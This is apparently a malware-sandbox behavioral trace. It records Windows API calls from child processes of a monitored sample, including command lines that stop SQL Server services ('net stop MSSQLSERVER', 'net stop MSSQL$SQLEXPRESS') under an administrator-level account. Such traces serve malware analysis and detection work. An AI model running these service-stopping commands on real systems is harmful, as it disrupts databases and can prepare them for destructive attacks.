[0127.974] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQLSERVER") returned -1 [0127.974] _wcsicmp (_String1="server", _String2="MSSQLSERVER") returned 6 [0127.974] _wcsicmp (_String1="svr", _String2="MSSQLSERVER") returned 6 [0127.974] _wcsicmp (_String1="srv", _String2="MSSQLSERVER") returned 6 [0127.974] _wcsicmp (_String1="lanmanserver", _String2="MSSQLSERVER") returned -1 [0127.974] _wcsicmp (_String1="alerter", _String2="MSSQLSERVER") returned -12 [0127.974] _wcsicmp (_String1="netlogon", _String2="MSSQLSERVER") returned 1 [0127.974] _wcsicmp (_String1="MSSQLSERVER", _String2="WORKSTATION") returned -10 [0127.975] _wcsicmp (_String1="MSSQLSERVER", _String2="LanmanWorkstation") returned 1 [0127.975] _wcsicmp (_String1="MSSQLSERVER", _String2="SERVER") returned -6 [0127.975] _wcsicmp (_String1="MSSQLSERVER", _String2="LanmanServer") returned 1 [0127.975] _wcsicmp (_String1="MSSQLSERVER", _String2="BROWSER") returned 11 [0127.975] _wcsicmp (_String1="MSSQLSERVER", _String2="BROWSER") returned 11 [0127.975] _wcsicmp (_String1="MSSQLSERVER", _String2="MESSENGER") returned 14 [0127.975] _wcsicmp (_String1="MSSQLSERVER", _String2="MESSENGER") returned 14 [0127.975] _wcsicmp (_String1="MSSQLSERVER", _String2="NETRUN") returned -1 [0127.975] _wcsicmp (_String1="MSSQLSERVER", _String2="NETRUN") returned -1 [0127.975] _wcsicmp (_String1="MSSQLSERVER", _String2="SPOOLER") returned -6 [0127.975] _wcsicmp (_String1="MSSQLSERVER", _String2="SPOOLER") returned -6 [0127.975] _wcsicmp (_String1="MSSQLSERVER", _String2="ALERTER") returned 12 [0127.975] _wcsicmp (_String1="MSSQLSERVER", _String2="ALERTER") returned 12 [0127.975] _wcsicmp (_String1="MSSQLSERVER", _String2="NETLOGON") returned -1 [0127.975] _wcsicmp (_String1="MSSQLSERVER", _String2="NETLOGON") returned -1 [0127.975] _wcsicmp (_String1="MSSQLSERVER", _String2="NETPOPUP") returned -1 [0127.975] _wcsicmp (_String1="MSSQLSERVER", _String2="NETPOPUP") returned -1 [0127.975] _wcsicmp (_String1="MSSQLSERVER", _String2="SQLSERVER") returned -6 [0127.975] _wcsicmp (_String1="MSSQLSERVER", _String2="SQLSERVER") returned -6 [0127.975] _wcsicmp (_String1="MSSQLSERVER", _String2="REPLICATOR") returned -5 [0127.975] _wcsicmp (_String1="MSSQLSERVER", _String2="REPLICATOR") returned -5 [0127.975] _wcsicmp (_String1="MSSQLSERVER", _String2="REMOTEBOOT") returned -5 [0127.975] _wcsicmp (_String1="MSSQLSERVER", _String2="REMOTEBOOT") returned -5 [0127.975] _wcsicmp (_String1="MSSQLSERVER", _String2="TIMESOURCE") returned -7 [0127.975] _wcsicmp (_String1="MSSQLSERVER", _String2="TIMESOURCE") returned -7 [0127.975] _wcsicmp (_String1="MSSQLSERVER", _String2="AFP") returned 12 [0127.975] _wcsicmp (_String1="MSSQLSERVER", _String2="AFP") returned 12 [0127.975] _wcsicmp (_String1="MSSQLSERVER", _String2="UPS") returned -8 [0127.975] _wcsicmp (_String1="MSSQLSERVER", _String2="UPS") returned -8 [0127.975] _wcsicmp (_String1="MSSQLSERVER", _String2="XACTSRV") returned -11 [0127.975] _wcsicmp (_String1="MSSQLSERVER", _String2="XACTSRV") returned -11 [0127.975] _wcsicmp (_String1="MSSQLSERVER", _String2="TCPIP") returned -7 [0127.975] _wcsicmp (_String1="MSSQLSERVER", _String2="TCPIP") returned -7 [0127.975] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0xc93758 [0127.975] OpenServiceW (hSCManager=0xc93758, lpServiceName="MSSQLSERVER", dwDesiredAccess=0x84) returned 0x0 [0127.975] GetLastError () returned 0x424 [0127.976] CloseServiceHandle (hSCObject=0xc93758) returned 1 [0127.976] wcscpy_s (in: _Destination=0x10a7698, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0127.976] LoadLibraryW (lpLibFileName="NETMSG") returned 0xc60000 [0127.976] FormatMessageW (in: dwFlags=0x2a00, lpSource=0xc60000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x10a7ca8, nSize=0x800, Arguments=0x10a7450 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0127.977] GetFileType (hFile=0x40) returned 0x2 [0127.977] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0xb1f8a8 | out: lpMode=0xb1f8a8) returned 1 [0127.978] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x10a7ca8*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0xb1f8b4, lpReserved=0x0 | out: lpBuffer=0x10a7ca8*, lpNumberOfCharsWritten=0xb1f8b4*=0x1e) returned 1 [0127.978] GetFileType (hFile=0x40) returned 0x2 [0127.978] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0xb1f8a8 | out: lpMode=0xb1f8a8) returned 1 [0127.978] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x1081250*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xb1f8b4, lpReserved=0x0 | out: lpBuffer=0x1081250*, lpNumberOfCharsWritten=0xb1f8b4*=0x2) returned 1 [0127.978] _ultow (in: _Dest=0x889, _Radix=11663560 | out: _Dest=0x889) returned="2185" [0127.978] FormatMessageW (in: dwFlags=0x2800, lpSource=0xc60000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x10a7ca8, nSize=0x800, Arguments=0x10a7450 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0127.979] GetFileType (hFile=0x40) returned 0x2 [0127.979] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0xb1f898 | out: lpMode=0xb1f898) returned 1 [0127.979] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x10a7ca8*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0xb1f8a4, lpReserved=0x0 | out: lpBuffer=0x10a7ca8*, lpNumberOfCharsWritten=0xb1f8a4*=0x34) returned 1 [0127.979] GetFileType (hFile=0x40) returned 0x2 [0127.979] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0xb1f898 | out: lpMode=0xb1f898) returned 1 [0127.979] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x1081250*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xb1f8a4, lpReserved=0x0 | out: lpBuffer=0x1081250*, lpNumberOfCharsWritten=0xb1f8a4*=0x2) returned 1 [0127.979] NetApiBufferFree (Buffer=0xc98340) returned 0x0 [0127.979] NetApiBufferFree (Buffer=0xc98400) returned 0x0 [0127.979] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQLSERVER" [0127.979] exit (_Code=2) Thread: id = 392 os_tid = 0xdec Process: id = "102" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x6869f000" os_pid = "0xe24" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb54" cmd_line = "/c net stop MSSQL$SQLEXPRESS" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6163 start_va = 0x3c0000 end_va = 0x40ffff entry_point = 0x3c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 6164 start_va = 0x6b0000 end_va = 0x46affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006b0000" filename = "" Region: id = 6165 start_va = 0x46b0000 end_va = 0x46cffff entry_point = 0x0 region_type = private name = "private_0x00000000046b0000" filename = "" Region: id = 6166 start_va = 0x46d0000 end_va = 0x46d0fff entry_point = 0x0 region_type = private name = "private_0x00000000046d0000" filename = "" Region: id = 6167 start_va = 0x46e0000 end_va = 0x46f3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000046e0000" filename = "" Region: id = 6168 start_va = 0x4700000 end_va = 0x473ffff entry_point = 0x0 region_type = private name = "private_0x0000000004700000" filename = "" Region: id = 6169 start_va = 0x4740000 end_va = 0x483ffff entry_point = 0x0 region_type = private name = "private_0x0000000004740000" filename = "" Region: id = 6170 start_va = 0x4840000 end_va = 0x4843fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004840000" filename = "" Region: id = 6171 start_va = 0x4850000 end_va = 0x4850fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004850000" filename = "" Region: id = 6172 start_va = 0x4860000 end_va = 0x4861fff entry_point = 0x0 region_type = private name = "private_0x0000000004860000" filename = "" Region: id = 6173 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 6174 start_va = 0x7f120000 end_va = 0x7f142fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f120000" filename = "" Region: id = 6175 start_va = 0x7f14b000 end_va = 0x7f14dfff entry_point = 0x0 region_type = private name = "private_0x000000007f14b000" filename = "" Region: id = 6176 start_va = 0x7f14e000 end_va = 0x7f14efff entry_point = 0x0 region_type = private name = "private_0x000000007f14e000" filename = "" Region: id = 6177 start_va = 0x7f14f000 end_va = 0x7f14ffff entry_point = 0x0 region_type = private name = "private_0x000000007f14f000" filename = "" Region: id = 6178 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6179 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 6180 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 6181 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6182 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 6183 start_va = 0x4a20000 end_va = 0x4a2ffff entry_point = 0x0 region_type = private name = "private_0x0000000004a20000" filename = "" Region: id = 6184 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 6185 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 6186 start_va = 0x4af0000 end_va = 0x4beffff entry_point = 0x0 region_type = private name = "private_0x0000000004af0000" filename = "" Region: id = 6187 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 6228 start_va = 0x46b0000 end_va = 0x46bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000046b0000" filename = "" Region: id = 6229 start_va = 0x4870000 end_va = 0x492dfff entry_point = 0x4870000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6230 start_va = 0x4930000 end_va = 0x496ffff entry_point = 0x0 region_type = private name = "private_0x0000000004930000" filename = "" Region: id = 6231 start_va = 0x4bf0000 end_va = 0x4ceffff entry_point = 0x0 region_type = private name = "private_0x0000000004bf0000" filename = "" Region: id = 6232 start_va = 0x4ec0000 end_va = 0x4ecffff entry_point = 0x0 region_type = private name = "private_0x0000000004ec0000" filename = "" Region: id = 6233 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 6234 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6235 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 6236 start_va = 0x7f020000 end_va = 0x7f11ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f020000" filename = "" Region: id = 6237 start_va = 0x7f148000 end_va = 0x7f14afff entry_point = 0x0 region_type = private name = "private_0x000000007f148000" filename = "" Region: id = 6238 start_va = 0x46c0000 end_va = 0x46c3fff entry_point = 0x0 region_type = private name = "private_0x00000000046c0000" filename = "" Region: id = 6239 start_va = 0x46d0000 end_va = 0x46d3fff entry_point = 0x0 region_type = private name = "private_0x00000000046d0000" filename = "" Region: id = 6240 start_va = 0x4ed0000 end_va = 0x5206fff entry_point = 0x4ed0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 393 os_tid = 0x27c [0128.132] GetModuleHandleA (lpModuleName=0x0) returned 0x3c0000 [0128.132] __set_app_type (_Type=0x1) [0128.132] __p__fmode () returned 0x77ac4d6c [0128.132] __p__commode () returned 0x77ac5b1c [0128.132] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3d36e0) returned 0x0 [0128.132] __getmainargs (in: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0, _DoWildCard=0, _StartInfo=0x3e50fc | out: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0) returned 0 [0128.132] GetCurrentThreadId () returned 0x27c [0128.132] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x27c) returned 0x84 [0128.132] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0128.132] GetProcAddress (hModule=0x77670000, lpProcName="SetThreadUILanguage") returned 0x776b2780 [0128.132] SetThreadUILanguage (LangId=0x0) returned 0x409 [0128.134] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0128.134] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x483fcfc | out: phkResult=0x483fcfc*=0x0) returned 0x2 [0128.135] VirtualQuery (in: lpAddress=0x483fd03, lpBuffer=0x483fcb4, dwLength=0x1c | out: lpBuffer=0x483fcb4*(BaseAddress=0x483f000, AllocationBase=0x4740000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0128.135] VirtualQuery (in: lpAddress=0x4740000, lpBuffer=0x483fcb4, dwLength=0x1c | out: lpBuffer=0x483fcb4*(BaseAddress=0x4740000, AllocationBase=0x4740000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0128.135] VirtualQuery (in: lpAddress=0x4741000, lpBuffer=0x483fcb4, dwLength=0x1c | out: lpBuffer=0x483fcb4*(BaseAddress=0x4741000, AllocationBase=0x4740000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0128.135] VirtualQuery (in: lpAddress=0x4743000, lpBuffer=0x483fcb4, dwLength=0x1c | out: lpBuffer=0x483fcb4*(BaseAddress=0x4743000, AllocationBase=0x4740000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0128.135] VirtualQuery (in: lpAddress=0x4840000, lpBuffer=0x483fcb4, dwLength=0x1c | out: lpBuffer=0x483fcb4*(BaseAddress=0x4840000, AllocationBase=0x4840000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0128.135] GetConsoleOutputCP () returned 0x1b5 [0128.135] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0128.135] SetConsoleCtrlHandler (HandlerRoutine=0x3df980, Add=1) returned 1 [0128.135] _get_osfhandle (_FileHandle=1) returned 0x3c [0128.135] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0128.135] _get_osfhandle (_FileHandle=1) returned 0x3c [0128.135] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0128.136] _get_osfhandle (_FileHandle=1) returned 0x3c [0128.136] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0128.136] _get_osfhandle (_FileHandle=0) returned 0x38 [0128.136] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0128.136] _get_osfhandle (_FileHandle=0) returned 0x38 [0128.136] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1e7) returned 1 [0128.136] GetEnvironmentStringsW () returned 0x4af7d68* [0128.136] FreeEnvironmentStringsA (penv="A") returned 1 [0128.136] GetEnvironmentStringsW () returned 0x4af7d68* [0128.136] FreeEnvironmentStringsA (penv="A") returned 1 [0128.136] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x483ec60 | out: phkResult=0x483ec60*=0x94) returned 0x0 [0128.136] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x483ec64, lpData=0x483ec6c, lpcbData=0x483ec68*=0x1000 | out: lpType=0x483ec64*=0x0, lpData=0x483ec6c*=0xa8, lpcbData=0x483ec68*=0x1000) returned 0x2 [0128.137] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x483ec64, lpData=0x483ec6c, lpcbData=0x483ec68*=0x1000 | out: lpType=0x483ec64*=0x4, lpData=0x483ec6c*=0x1, lpcbData=0x483ec68*=0x4) returned 0x0 [0128.137] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x483ec64, lpData=0x483ec6c, lpcbData=0x483ec68*=0x1000 | out: lpType=0x483ec64*=0x0, lpData=0x483ec6c*=0x1, lpcbData=0x483ec68*=0x1000) returned 0x2 [0128.137] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x483ec64, lpData=0x483ec6c, lpcbData=0x483ec68*=0x1000 | out: lpType=0x483ec64*=0x4, lpData=0x483ec6c*=0x0, lpcbData=0x483ec68*=0x4) returned 0x0 [0128.137] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x483ec64, lpData=0x483ec6c, lpcbData=0x483ec68*=0x1000 | out: lpType=0x483ec64*=0x4, lpData=0x483ec6c*=0x40, lpcbData=0x483ec68*=0x4) returned 0x0 [0128.137] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x483ec64, lpData=0x483ec6c, lpcbData=0x483ec68*=0x1000 | out: lpType=0x483ec64*=0x4, lpData=0x483ec6c*=0x40, lpcbData=0x483ec68*=0x4) returned 0x0 [0128.137] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x483ec64, lpData=0x483ec6c, lpcbData=0x483ec68*=0x1000 | out: lpType=0x483ec64*=0x0, lpData=0x483ec6c*=0x40, lpcbData=0x483ec68*=0x1000) returned 0x2 [0128.137] RegCloseKey (hKey=0x94) returned 0x0 [0128.137] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x483ec60 | out: phkResult=0x483ec60*=0x94) returned 0x0 [0128.137] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x483ec64, lpData=0x483ec6c, lpcbData=0x483ec68*=0x1000 | out: lpType=0x483ec64*=0x0, lpData=0x483ec6c*=0x40, lpcbData=0x483ec68*=0x1000) returned 0x2 [0128.137] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x483ec64, lpData=0x483ec6c, lpcbData=0x483ec68*=0x1000 | out: lpType=0x483ec64*=0x4, lpData=0x483ec6c*=0x1, lpcbData=0x483ec68*=0x4) returned 0x0 [0128.137] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x483ec64, lpData=0x483ec6c, lpcbData=0x483ec68*=0x1000 | out: lpType=0x483ec64*=0x0, lpData=0x483ec6c*=0x1, lpcbData=0x483ec68*=0x1000) returned 0x2 [0128.137] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x483ec64, lpData=0x483ec6c, lpcbData=0x483ec68*=0x1000 | out: lpType=0x483ec64*=0x4, lpData=0x483ec6c*=0x0, lpcbData=0x483ec68*=0x4) returned 0x0 [0128.137] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x483ec64, lpData=0x483ec6c, lpcbData=0x483ec68*=0x1000 | out: lpType=0x483ec64*=0x4, lpData=0x483ec6c*=0x9, lpcbData=0x483ec68*=0x4) returned 0x0 [0128.137] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x483ec64, lpData=0x483ec6c, lpcbData=0x483ec68*=0x1000 | out: lpType=0x483ec64*=0x4, lpData=0x483ec6c*=0x9, lpcbData=0x483ec68*=0x4) returned 0x0 [0128.137] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x483ec64, lpData=0x483ec6c, lpcbData=0x483ec68*=0x1000 | out: lpType=0x483ec64*=0x0, lpData=0x483ec6c*=0x9, lpcbData=0x483ec68*=0x1000) returned 0x2 [0128.137] RegCloseKey (hKey=0x94) returned 0x0 [0128.137] time (in: timer=0x0 | out: timer=0x0) returned 0x5ad29831 [0128.137] srand (_Seed=0x5ad29831) [0128.137] GetCommandLineW () returned="/c net stop MSSQL$SQLEXPRESS" [0128.137] GetCommandLineW () returned="/c net stop MSSQL$SQLEXPRESS" [0128.137] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0128.137] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4af9cc0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0128.137] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0128.137] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0128.137] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0128.137] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0128.137] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0128.137] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0128.137] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0128.137] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0128.137] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0128.137] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0128.137] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0128.138] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0128.138] GetEnvironmentStringsW () returned 0x4af7d68* [0128.138] FreeEnvironmentStringsA (penv="A") returned 1 [0128.138] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0128.138] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0128.138] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0128.138] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0128.138] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0128.138] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0128.138] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0128.138] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0128.138] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0128.138] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0128.138] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x483fa38 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0128.138] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0x483fa38, lpFilePart=0x483fa30 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x483fa30*="Desktop") returned 0x1d [0128.138] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0128.138] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x483f7b8 | out: lpFindFileData=0x483f7b8) returned 0x4af05c8 [0128.138] FindClose (in: hFindFile=0x4af05c8 | out: hFindFile=0x4af05c8) returned 1 [0128.138] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x483f7b8 | out: lpFindFileData=0x483f7b8) returned 0x4af05c8 [0128.139] FindClose (in: hFindFile=0x4af05c8 | out: hFindFile=0x4af05c8) returned 1 [0128.139] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0128.139] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x483f7b8 | out: lpFindFileData=0x483f7b8) returned 0x4af05c8 [0128.139] FindClose (in: hFindFile=0x4af05c8 | out: hFindFile=0x4af05c8) returned 1 [0128.139] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0128.139] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0128.139] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0128.139] GetEnvironmentStringsW () returned 0x4af7d68* [0128.139] FreeEnvironmentStringsA (penv="=") returned 1 [0128.139] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0128.140] GetConsoleOutputCP () returned 0x1b5 [0128.140] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0128.140] GetUserDefaultLCID () returned 0x409 [0128.140] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x3f24a0, cchData=8 | out: lpLCData=":") returned 2 [0128.140] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x483fb68, cchData=128 | out: lpLCData="0") returned 2 [0128.140] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x483fb68, cchData=128 | out: lpLCData="0") returned 2 [0128.140] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, 